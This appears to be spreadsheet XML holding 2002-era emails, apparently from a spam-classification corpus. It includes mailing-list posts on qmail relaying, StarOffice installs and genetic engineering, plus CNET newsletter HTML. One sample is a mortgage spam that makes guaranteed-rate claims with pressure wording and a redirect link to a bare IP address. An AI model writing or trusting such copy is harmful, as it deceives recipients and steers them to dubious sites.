 IHRlY2huaWNhbCBhYmlsaXR5LiBXZSBob25vciANCiAgICAgIGFsbCByZW1v
 dmFsIHJlcXVlc3RzLiBUbyBiZSByZW1vdmVkIGZyb20gb3VyIGRhdGFiYXNl
 LCBwbGVhc2UgZG8gDQogICAgICBmb2xsb3dpbmc7IFJlcGx5IHRvIG1lc3Nh
 Z2Ugd2l0aCB0aGUgd29yZCAmcXVvdDtSZW1vdmUmcXVvdDsgaW4gdGhlIHN1
 YmplY3QgbGluZS4gDQogICAgICBFbWFpbCByZXBsaWVzIG1heSB0YWtlIHVw
 IHRvIDUgYnVzaW5lc3MgZGF5cyB0byBwcm9jZXNzLjwvZm9udD48L3R0Pjwv
 dGQ+DQogICAgPC90cj4NCiAgPC90YWJsZT4NCiAgPC9jZW50ZXI+DQo8L2Rp
 dj4NCjwvYm9keT4NCjwvaHRtbD4NCg==
 ------=_NextPart_000_00E6_61E42E2B.C1032A62--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] FW: intigration with qmail
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 09:44:33AM -0500, Michael J Humphries wrote:
 &gt; I sent this message already and I am sorry if I am asking the wrong
 &gt; question or if I have been asking stupid questions but I am in an urgent
 &gt; time when people are using my service to spam others and I NEED to stop
 &gt; them quickly.
 Sounds like you're solving the wrong problem.  If untrusted strangers
 are relaying spam through your qmail server, it's a fair bet that
 you've seriously botched your qmail config (like forgetting to create
 an rcpthosts file or something).
 Anyway, if you insist on using razor to resolve this problem, I
 would suggest tossing qmail-scanner &lt;http://qmail-scanner.sf.net/&gt;
 and SpamAssassin &lt;http://www.spamassassin.org/&gt; into the mix as well.
 The former provides the qmail-integration framework on which the latter
 does its work (including razor-check invocations).
 Fair warning: It'll be far more resource-intensive than simply denying
 relaying privileges to everyone except the folks you trust.  To find
 out how to do that, go to &lt;http://www.qmail.org/&gt; (which, incidentally,
 should be your first stop for all things qmail) and search for "qmail
 newbie's guide to relaying".
 - Adrian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</si>
  <si>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[zzzzteana] RE: Alexander
</t>
  </si>
  <si>
    <t xml:space="preserve">Martin A posted:
 Tassos Papadopoulos, the Greek sculptor behind the plan, judged that the
  limestone of Mount Kerdylio, 70 miles east of Salonika and not far from the
  Mount Athos monastic community, was ideal for the patriotic sculpture. 
  As well as Alexander's granite features, 240 ft high and 170 ft wide, a
  museum, a restored amphitheatre and car park for admiring crowds are
 planned
 ---------------------
 So is this mountain limestone or granite?
 If it's limestone, it'll weather pretty fast.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] staroffice 6.0 installation freezes under RH7.3
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,
 Just wondering if anyone has ever installed StarOffice
 6.0 (or Open Office), and if any have experienced any
 problems with the install freezing ?
 I'm using RedHat 7.3 kernel 2.4.18-3, and glibc 2.2.5
 ?
 I might try downloading OpenOffice instead if it is
 unresolved!!!!
 Cheers all,
 Colin
 __________________________________________________
 Do You Yahoo!?
 Everything you'll ever need on one web page
 from News and Sport to Email and Music Charts
 http://uk.my.yahoo.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 In a message dated 7/23/2002 6:02:27 PM, dl@silcom.com writes:
 &gt;If we're willing to count artificial
 &gt;selection as genetic engineering, 
 Of course was genetic engineering. It used the fundamental mechanism of 
 genetics (inheritance of traits), and not randomly, but 
 intentionally--breeding for long fur, fat hams, whatever. The degree to which 
 the engineers--farmers, breeders--understood exactly how the mehcanism works 
 is only marginally relevant to the question of whether it was engineering. 
 Science progresses. Over the years, centuries, their, our, knowledge 
 increased, and domestication became more effective. Bit by bit the mechanisms 
 became known--Mendel making a major breakthrough. The first hybrid grains 
 (which date from the 1920s) represent another step. Watson and Crick another, 
 etc. But it's engineering--just as Roman architecture was civil engineering, 
 even if they knew less about the mathematics behind it than we do today, just 
 as Galen was a physician, though laughably ignorant by our standards.
 T
 Tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lowest possible interest rate for you--GUARANTEED.
</t>
  </si>
  <si>
    <t xml:space="preserve">Some opportunities only come around every 30
 years or so. This is one of those. Why?
 Because interest rates are definitely rising.
 Have you locked in the lowest rate (in THREE
 DECADES yet!) for your present mortgage?
 Rates haven't been this low in almost 3 decades.
 They may well never be this low again--ever. If
 you haven't taken this opportunity to secure the
 best possible rate on your home loan, you're
 simply letting money slip through your fingers.
 At a few special times, it is SO easy to save
 "big bucks"...and this is one of those times. Why
 continue to pay more than is necessary and
 continue to let future savings slip away?
 We're a national mortgage provider. We're NOT a
 broker. As such, we can guarantee you the lowest
 possible rate and the best possible deal but only
 if you act NOW.
 There is no charge, cost or obligation to see if
 this opportunity meets your needs. You can easily
 determine if a new loan makes sense for you, and
 exactly why, because we provide only "easy to
 understand" quotes (in "layman's terms", in other
 words).
 We offer primary and secondary home loans and we
 will be happy to show you in "black and white"
 why your existing loan is the best for you or why
 you should replace it. Of course, there's no cost
 to you at all to share your time with us. None. 
 Take 2 minutes and use the link below that works
 best for you. For 2 minutes of your time, we'll
 show you how you can save you and your family
 "big bucks" today. This is a once-every-30-years
 opportunity. So don't delay and "miss the boat".
 Act now.
 &lt;a href="http://gd11.doubleclick.net/click;3518383;15-0;0;6177677;1-468|60;0|0|0;;http://61.129.81.99/paul/bren/mortg/"&gt;Click_Here&lt;/a&gt;
 http://gd11.doubleclick.net/click;3518383;15-0;0;6177677;1-468|60;0|0|0;;http://61.129.81.99/paul/bren/mortg/
 Sincerely,
 Mark. R. McCullough
 WMLN, Inc.
 __________________________________________________________________
 Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/
 Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Digital Dispatch Weekly Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;
 		&lt;img src="http://www.cnet.com/i/dp/dd_a.gif" width="442" height="60" border="0" alt="Digital Dispatch"&gt;&lt;br&gt;
 			&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td width=10 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td  width=430&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
       		&lt;/table&gt;	
 	&lt;/td&gt;
 	&lt;!-- Skyscraper column --&gt;
 &lt;td width=160 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/dp/dd_b.gif" width=160 height=18&gt;&lt;br&gt;
 &lt;!-- START AD --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 &lt;tr&gt;
 &lt;td align=center bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width=120 height=10&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- shopping  --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzzW4FSbyotR-pp7us2QfiR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Toshiba.sky.6100green_160x600.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /shopping --&gt;
 &lt;!-- /ad --&gt;
  &lt;br&gt;
 		&lt;!-- right column content --&gt;
 &lt;!-- search form --&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/se/dispatch_hd.gif" width=150 height=20 alt="CNET Search.com" border=0&gt;&lt;br&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 &lt;input type=text name=q size=17 value=""&gt;&lt;br&gt;
 &lt;select name=target class=frmel&gt;
  &lt;option value="http://cnet.search.com/search?tag=ex.digital.dispatch.srch.cnet"&gt;All CNET
  &lt;option value="http://www.search.com/search?tag=ex.digital.dispatch.srch.web"&gt;The Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit value="Go!"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
 				&lt;!-- NEWS BLOCK --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_techNEWS.gif" alt="Tech News News.com" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" cellpadding=0 cellspacing=2 border=0&gt;&lt;tr&gt;
 				&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIzY4Kf2vvKNXLTSyPWc3PR" &gt;Apple to expand iMac LCD display&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcnXEWNoysxoLkkTKhn-dR" &gt;It ain't heavy; it's my laptop&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2c-Nq6R6fez6pa6cIJuR" &gt;Gateway touts chic yet cheap PCs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=75-whwtIKUAIuv5QEI_rjups7LLZ5ZR" &gt;Apple's iPod comes to Linux&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXndaN5102OO3Nt-tKChBwnR" &gt;Dell PCs coming to a mall near you&lt;/a&gt;&lt;p&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdL3uaQaOYlcGhVIlcU_eR" &gt;More CNET News&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /NEWS BLOCK --&gt;
 				 &lt;br&gt;
 				&lt;!-- TOP DOWNLOADS --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_TOPdwnlds.gif" alt="Top Downloads" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" border=0 cellpadding=2 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1xDRDmpvqJzDxDXozLCyR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td width="100%25"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkUNpeGWvjg0SxiPZvH6lR" &gt;Quintessential Player 3.4&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWaOAV8vEXtTbDS-BJjho4R" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwjRqfzSmCs3CyJqsjeorR" &gt;AI Picture Utility 6.2.1&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFUrntnmGg3F-erCpGY9iR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQF77qorK2Rl28NRQSnqQPR" &gt;ICQ 2002a Build #3728&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6jNLGtsDDFWVhZSgRXBnR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBsy9abyHWXl_kj2ZBSJuRR" &gt;Deck 3.5 (for the Mac)&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /TOP DOWNLOADS --&gt;
 				 &lt;br&gt;
 				&lt;!-- EDITORS' CHOICE --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_EdCHOICE.gif" alt="Editors' Choice" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%25" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- hardware --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sj9glgtIobvZm5yGKIaZR" &gt;Dell Latitude C510/C610 series&lt;/a&gt;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUf02FYR7VrqMtNXjoCKqdR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Hardware&lt;/font&gt;
 &lt;!-- /hardware --&gt;	
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- electronics --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naPmSLNTieplrQ8kasp4eR" &gt;Toshiba Pocket PC e310&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyk_lg_21lXdIl9Oi-UiyR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Electronics&lt;/font&gt;
 &lt;!-- /electronics --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- software --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0dz-iCWJMr9i_f_B0NLnlR" &gt;AutoCAD LT 2002&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKgZRth7kWdT_pfmeDx04R" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Software&lt;/font&gt;
 &lt;!-- /software --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- wireless --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0Lr5IW9QhmBz6gEwTinhlyR" &gt;Sony Ericsson T68&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFEFDJeqXH3XX8owMnerlR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Wireless&lt;/font&gt;
 &lt;!-- /wireless --&gt;				
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				 &lt;br&gt;
 				&lt;!-- /EDITORS' CHOICE --&gt;
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://www.cnet.com/i/dp/dd_c.gif" width="9" height="60" border="0"&gt;&lt;br&gt;
 		&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section --&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=430 bgcolor="#ffffff"&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
 			&lt;tr valign=top&gt;
 			&lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=412&gt;
 			&lt;table cellpadding=8 cellspacing=0 border=0&gt;
 &lt;!-- date --&gt;				&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 11, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr valign=top&gt;
 					&lt;td width=76 align=right&gt;
 						&lt;img src="http://www.cnet.com/i/dp/hd_janicec.gif" width="66" height="86" border="0"&gt;&lt;br&gt;
 						&lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
 						--Janice Chen,&lt;br&gt;
 						editor in chief,&lt;br&gt;
 						CNET Reviews&lt;br&gt;
 						&lt;/font&gt;
 					&lt;/td&gt;
 					&lt;td width=10&gt; &lt;/td&gt;
 					&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 						&lt;font color="#333333"&gt;&lt;B&gt;Dear readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 						&lt;font size="-1"&gt;
 It was a crushing blow to discover that &lt;a 
 href="http://www.cnet.com/software/0-3227852-1204-9931175.html"&gt;Vindigo&lt;/a&gt;, my
 all-time-favorite Palm app, was no longer free. Twenty-five bucks
 wasn't steep, but the principle of paying for a former freebie
 was hard to swallow. Not that hard, though; surprising
 myself--and my fellow cheapskates--I've discovered that I'd
 rather dish out the dough than go Vindigo-free myself.
 &lt;p&gt;
 That's what Web-based e-mail providers are banking on. Now that
 most of us have gotten sucked in by those gratis Web e-mail
 accounts, most "free" Web e-mailers have started charging for
 premium services or imposing strict limitations on free accounts.
 Read our &lt;a 
 href="http://home.cnet.com/software/0-3227888-8-20089773-1.html"&gt;reviews&lt;/a&gt; 
 of the four top services to see what you get if
 you dish out the dough (or not)--and which to avoid if you want
 to stay spam-free.
 &lt;p&gt;
 Surfacing on this week's Buzz Meter is another free-gone-fee app.
 The latest version of the popular file-sharing software BearShare
 now offers a paid version that lets you search and download
 without those annoying ads. Maybe the best things in life are now
 those with a fee.
 &lt;br&gt;
 &lt;/font&gt;&lt;br&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr&gt;&lt;td colspan=2&gt;&lt;font size=1&gt; &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 				&lt;td width="175"&gt;&lt;a href="#buzz"&gt;&lt;img src="http://www.cnet.com/i/dp/THISweeks_BUZZ.gif" alt="This Week's Buzz Meter" width="175" height="18" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;td align="left"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#buzz"&gt;WorldCom woes continue&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" height="8" width="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;/td&gt;
 			&lt;td width=8&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 	&lt;tr valign=top&gt;
 		&lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;
 &lt;tr&gt;&lt;td&gt;
 			&lt;font face="Arial, Helvetica"&gt;
 &lt;!-- Leads Module --&gt;
 &lt;img src="http://www.cnet.com/i/gl/new-cc.gif" alt="Crucial Clicks" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;table width="100%"  cellpadding="0" cellspacing="0" border="0" bgcolor="#ffffff"&gt;
 &lt;tr bgcolor="#cccccc"&gt;&lt;td colspan="7"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#cccccc" rowspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=1&gt;&lt;/td&gt;
 &lt;td rowspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=5 width=1&gt;&lt;/td&gt;
 &lt;td rowspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td bgcolor="#cccccc" rowspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign="top"&gt;
 &lt;td width="100%"&gt;
 	&lt;table width="100%"  cellpadding="0" cellspacing="0" border="0"&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482ubw9FVNmap_vCgSyiL4R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/042502mpsplayers.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2I6po9PjQ1U5MauO37xrR" &gt;&lt;b&gt;Next-generation MP3 players&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;These three hard drive-based MP3 players turn last year's models into paperweights.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrWEtvpIvS8IeOdSKzjX1iR" &gt;Mojo rising: TDK's new MP3 CD player&lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB680jDU6m-EDvznhjonlZR" &gt;The Nomad Jukebox 3 breaks new ground&lt;/a&gt;&lt;br /&gt;
 	&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="180"&gt;
 	&lt;table cellpadding="0" cellspacing="0" width="180" border="0" bgcolor="#ffffef"&gt;
 	&lt;tr&gt;&lt;td colspan="5" bgcolor="#666666"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" alt="" border="0" /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;
 	&lt;td bgcolor="#666666"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" alt="" border="0" /&gt;&lt;/td&gt;
 	&lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" alt="" border="0" /&gt;&lt;/td&gt;
 	&lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="5" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;font face="arial, helvetica" color="#666666" size="-1"&gt;&lt;b&gt;Most popular&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="5" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;MP3 &amp;amp; audio&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	1. &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDUTF1Y12xCjjvDSwizzcR" &gt;Creative Labs Nomad Jukebox 3&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
